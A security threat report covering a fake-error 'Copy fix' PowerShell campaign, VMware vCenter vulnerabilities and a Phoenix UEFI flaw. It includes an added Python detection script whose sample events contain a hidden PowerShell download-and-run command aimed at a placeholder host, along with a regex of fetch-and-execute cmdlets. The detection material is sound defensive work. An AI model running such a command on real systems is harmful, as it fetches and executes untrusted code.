Mia Davis
June 24, 2024
5 Min

Threat Report 24.06.24

Fake errors in Google Chrome, Word, and OneDrive run malicious scripts

Threat actors have launched a campaign tricking users of Google Chrome, Word, and OneDrive with a fake error page into running malicious scripts.

The Google Chrome variant of the attack begins when the user visits a compromised website that loads a malicious script, which displays a fake Google Chrome warning stating that there was a problem loading the webpage. The on-screen instructions guide the user to click a ‘Copy fix’ button and then paste the copied content into Windows PowerShell (Admin). When run, the script performs various checks before deploying additional payloads. The Word and OneDrive variants function similarly.

Since the process requires significant user input, it’s important to remain vigilant about your actions, especially when running programs as admin. When in doubt, consult your IT or security team.
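A detection-side illustration of the chain described above, added here and not part of the original report: it scans constructed process-creation records (Sysmon Event ID 1 style fields; the sample values are made up) for an elevated PowerShell launched from the user's desktop shell whose command line fetches or decodes remote code. The field names, the parent-process list and the indicator pattern are assumptions of this example, not taken from the report.

```python
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1 fields.
# All values are made up for this example; the URL uses the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "IntegrityLevel": "High",
     "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/fix.ps1 | iex"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "IntegrityLevel": "Medium",
     "CommandLine": "powershell Get-Process"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\ConfigMgr\ccmexec.exe",
     "IntegrityLevel": "System",
     "CommandLine": "powershell -ExecutionPolicy Bypass -File C:\\deploy\\inventory.ps1"},
]

# Assumed indicator set: cmdlets/aliases that pull or decode code at run time.
REMOTE_FETCH = re.compile(
    r"(downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|\biex\b|"
    r"invoke-expression|frombase64string|-enc\w*\s)", re.I)

# Parents that mean "a human launched this from the desktop" (assumption).
INTERACTIVE_PARENTS = ("explorer.exe",)


def is_clickfix_like(event: dict) -> bool:
    """True when an elevated PowerShell was started from the user's shell
    (the 'Run as administrator' path a pasted 'fix' takes) and its command
    line fetches or decodes code instead of running a local script."""
    image = event["Image"].lower()
    parent = event["ParentImage"].lower().rsplit("\\", 1)[-1]
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return False
    if parent not in INTERACTIVE_PARENTS:
        return False
    if event["IntegrityLevel"] not in ("High", "System"):
        return False
    return bool(REMOTE_FETCH.search(event["CommandLine"]))


def triage(events) -> list:
    """Return the command lines of events worth an analyst's attention."""
    return [e["CommandLine"] for e in events if is_clickfix_like(e)]
```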

VMware fixes critical vulnerabilities affecting vCenter Server and Cloud Foundation

VMware has released fixes for critical vulnerabilities in its vCenter Server platform, the central management platform used to manage virtual machines and ESXi hosts for VMware vSphere. These vulnerabilities affect VMware vCenter Server versions 7.0 and 8.0 and VMware Cloud Foundation versions 4.x and 5.x.

The vulnerabilities are as follows:

  • CVE-2024-37079 - A heap-overflow vulnerability in the implementation of the DCERPC protocol that could allow a malicious actor with network access to vCenter Server to achieve remote code execution by sending a specially crafted network packet.
  • CVE-2024-37080 - A heap-overflow vulnerability in the implementation of the DCERPC protocol that could allow a malicious actor with network access to vCenter Server to achieve remote code execution by sending a specially crafted network packet.
  • CVE-2024-37081 - Multiple local privilege escalation vulnerabilities due to misconfiguration of sudo that could allow an authenticated local user with non-administrative privileges to elevate privileges to root on vCenter Server Appliance.

It’s recommended to update to the latest version of vCenter Server, in which these vulnerabilities are fixed, as soon as possible.

Phoenix SecureCore UEFI vulnerability affects multiple families of Intel CPUs

Security researchers have released a report detailing a vulnerability in Phoenix SecureCore UEFI firmware, affecting multiple families of Intel CPUs. UEFI is a motherboard firmware which initialises hardware components and loads the operating system. This vulnerability affects devices using Phoenix SecureCore firmware on select Intel processor families, including AlderLake, CoffeeLake, CometLake, IceLake, JasperLake, KabyLake, MeteorLake, RaptorLake, RocketLake, and TigerLake.

The vulnerability, tracked as CVE-2024-0762, has a CVSS score of 7.5 and is a potential buffer overflow caused by unsafe UEFI variable handling that allows an attacker to escalate privileges and perform code execution. Successful exploitation can give threat actors ongoing persistence on the device, at a level that often evades higher-level security measures in the operating system.

If you have identified your hardware as affected by this vulnerability, it is advised to consult vendor recommendations as to what measures should be taken.
